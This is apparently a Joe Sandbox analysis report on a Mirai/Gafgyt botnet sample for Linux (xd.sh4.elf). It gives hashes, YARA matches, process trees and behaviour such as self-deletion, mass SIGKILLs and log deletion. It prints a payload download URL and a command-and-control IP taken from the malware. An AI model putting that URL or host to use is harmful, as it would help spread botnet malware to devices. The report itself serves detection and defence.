
Linux Analysis Report
xd.sh4.elf

Overview

General Information

Sample name: xd.sh4.elf
Analysis ID: 1654967
MD5: 36584cff9e8b6f567ccbec876174ed0e
SHA1: a1527c38535889a395d57101ce8e6731099ae9fa
SHA256: 4cba27a0b9f0fa526fad50047b72767853b55ad5bda6636469046486835bd9bc
Tags: elf, user-abuse_ch

Detection

Mirai
Score: 100
Range: 0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample deletes itself
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to kill multiple processes (SIGKILL)
Deletes log files
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "grep" command used to find patterns in files or piped streams
Executes the "kill" or "pkill" command typically used to terminate processes
Reads CPU information from /sys indicative of miner or evasive malware
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1654967
Start date and time: 2025-04-02 20:47:24 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Sample name: xd.sh4.elf
Detection: MAL
Classification: mal100.spre.troj.evad.linELF@0/16@0/0
  • Connection to analysis system has been lost, crash info: Unknown
  • VT rate limit hit for: http://213.209.129.92/d/xd.arm7;chmod
  • system is lnxubuntu20
  • xd.sh4.elf (PID: 5414, Parent: 5336, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/xd.sh4.elf
  • systemd New Fork (PID: 5449, Parent: 1)
  • journalctl (PID: 5449, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5465, Parent: 1)
  • systemd New Fork (PID: 5466, Parent: 1)
  • systemd New Fork (PID: 5472, Parent: 1)
  • systemd New Fork (PID: 5473, Parent: 1)
  • systemd New Fork (PID: 5474, Parent: 1)
  • systemd New Fork (PID: 5525, Parent: 1)
  • systemd New Fork (PID: 5528, Parent: 1)
  • systemd New Fork (PID: 5529, Parent: 1)
  • systemd New Fork (PID: 5531, Parent: 1)
  • systemd New Fork (PID: 5532, Parent: 1)
  • systemd New Fork (PID: 5533, Parent: 1)
  • systemd New Fork (PID: 5534, Parent: 2935)
  • pulseaudio (PID: 5534, Parent: 2935, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5535, Parent: 1)
  • gdm3 New Fork (PID: 5536, Parent: 1400)
  • Default (PID: 5536, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5537, Parent: 1400)
  • Default (PID: 5537, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5538, Parent: 1400)
  • Default (PID: 5538, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5539, Parent: 1)
  • systemd New Fork (PID: 5541, Parent: 1)
  • systemd New Fork (PID: 5543, Parent: 1)
  • systemd New Fork (PID: 5544, Parent: 1)
  • gpu-manager (PID: 5544, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5545, Parent: 5544, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5546, Parent: 5545)
      • grep (PID: 5546, Parent: 5545, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5547, Parent: 5544, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5548, Parent: 5547)
      • grep (PID: 5548, Parent: 5547, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5549, Parent: 5544, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5550, Parent: 5549)
      • grep (PID: 5550, Parent: 5549, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5551, Parent: 5544, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5552, Parent: 5551)
      • grep (PID: 5552, Parent: 5551, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5553, Parent: 5544, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5554, Parent: 5553)
      • grep (PID: 5554, Parent: 5553, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5555, Parent: 5544, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5556, Parent: 5555)
      • grep (PID: 5556, Parent: 5555, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5557, Parent: 5544, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5558, Parent: 5557)
      • grep (PID: 5558, Parent: 5557, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5559, Parent: 5544, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5560, Parent: 5559)
      • grep (PID: 5560, Parent: 5559, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5561, Parent: 1)
  • generate-config (PID: 5561, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5562, Parent: 5561, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5563, Parent: 1)
  • gdm-wait-for-drm (PID: 5563, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • gdm3 (PID: 5564, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
  • fusermount (PID: 5586, Parent: 3122, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • gpu-manager (PID: 5596, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • gpu-manager (PID: 5607, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • gpu-manager (PID: 5617, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • gpu-manager (PID: 5627, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • gpu-manager (PID: 5637, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • plymouth (PID: 5647, Parent: 1, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: /bin/plymouth quit
  • cleanup
Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
Source | Rule | Description | Author | Strings
xd.sh4.elf | JoeSecurity_Mirai_9 | Yara detected Mirai | Joe Security
xd.sh4.elf | JoeSecurity_Mirai_5 | Yara detected Mirai | Joe Security
xd.sh4.elf | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
xd.sh4.elf | Linux_Trojan_Gafgyt_28a2fe0c | unknown | unknown
xd.sh4.elf | Linux_Trojan_Gafgyt_ea92cca8 | unknown | unknown
  • 0x115c0:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Source | Rule | Description | Author | Strings
5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp | JoeSecurity_Mirai_9 | Yara detected Mirai | Joe Security
5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp | JoeSecurity_Mirai_5 | Yara detected Mirai | Joe Security
5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp | Linux_Trojan_Gafgyt_28a2fe0c | unknown | unknown
5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp | Linux_Trojan_Gafgyt_ea92cca8 | unknown | unknown
  • 0x115c0:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
No Suricata rule has matched



AV Detection

Source: xd.sh4.elf | Avira: detected
Source: xd.sh4.elf | Virustotal: Detection: 63%
Source: xd.sh4.elf | ReversingLabs: Detection: 63%
Source: /usr/bin/pulseaudio (PID: 5534) | Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5562) | Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: global traffic | TCP traffic: 192.168.2.13:56002 -> 213.209.129.92:5466
Source: /tmp/xd.sh4.elf (PID: 5417) | Socket: 0.0.0.0:23
Source: /tmp/xd.sh4.elf (PID: 5417) | Socket: 0.0.0.0:0
Source: /tmp/xd.sh4.elf (PID: 5417) | Socket: 0.0.0.0:80
Source: /tmp/xd.sh4.elf (PID: 5417) | Socket: 0.0.0.0:81
Source: /tmp/xd.sh4.elf (PID: 5417) | Socket: 0.0.0.0:8443
Source: /tmp/xd.sh4.elf (PID: 5417) | Socket: 0.0.0.0:9009
Source: xd.sh4.elf | String found in binary or memory: http://213.209.129.92/d/xd.arm7;chmod

System Summary

Source: xd.sh4.elf, type: SAMPLE
  Matched rule: Linux_Trojan_Gafgyt_28a2fe0c, Author: unknown
  Matched rule: Linux_Trojan_Gafgyt_ea92cca8, Author: unknown
  Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
  Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
Source: 5414.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, 5419.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, 5421.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, 5423.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, 5425.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, 5427.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, 5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY (each of the seven dumps matched all four rules)
  Matched rule: Linux_Trojan_Gafgyt_28a2fe0c, Author: unknown
  Matched rule: Linux_Trojan_Gafgyt_ea92cca8, Author: unknown
  Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
  Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
Source: Process Memory Space: xd.sh4.elf PID: 5414, 5419, 5421, 5423, 5425, 5427, 5430, type: MEMORYSTR (each of the seven processes matched both rules)
  Matched rule: Linux_Trojan_Gafgyt_28a2fe0c, Author: unknown
  Matched rule: Linux_Trojan_Gafgyt_ea92cca8, Author: unknown
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 936, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 490, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 726, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 727, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 765, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 767, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 778, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 780, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 783, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 790, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 792, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 793, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 795, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 797, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 800, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 802, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 803, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 855, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 1410, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 1411, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 1432, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 2935, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 2936, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 2970, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 3095, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 3100, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 3132, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 5253, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 5396, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 5397, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 5534, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5417), SIGKILL sent: pid: 5564, result: successful
              Source: /tmp/xd.sh4.elf (PID: 5421), SIGKILL sent: pid: -5421, result: unknown
              Source: ELF static info symbol of initial sample, .symtab present: no
              Source: xd.sh4.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: xd.sh4.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: xd.sh4.elf, type: SAMPLEMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: xd.sh4.elf, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: 5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5423.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5423.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: 5423.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 5423.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5421.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5421.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: 5419.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5419.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
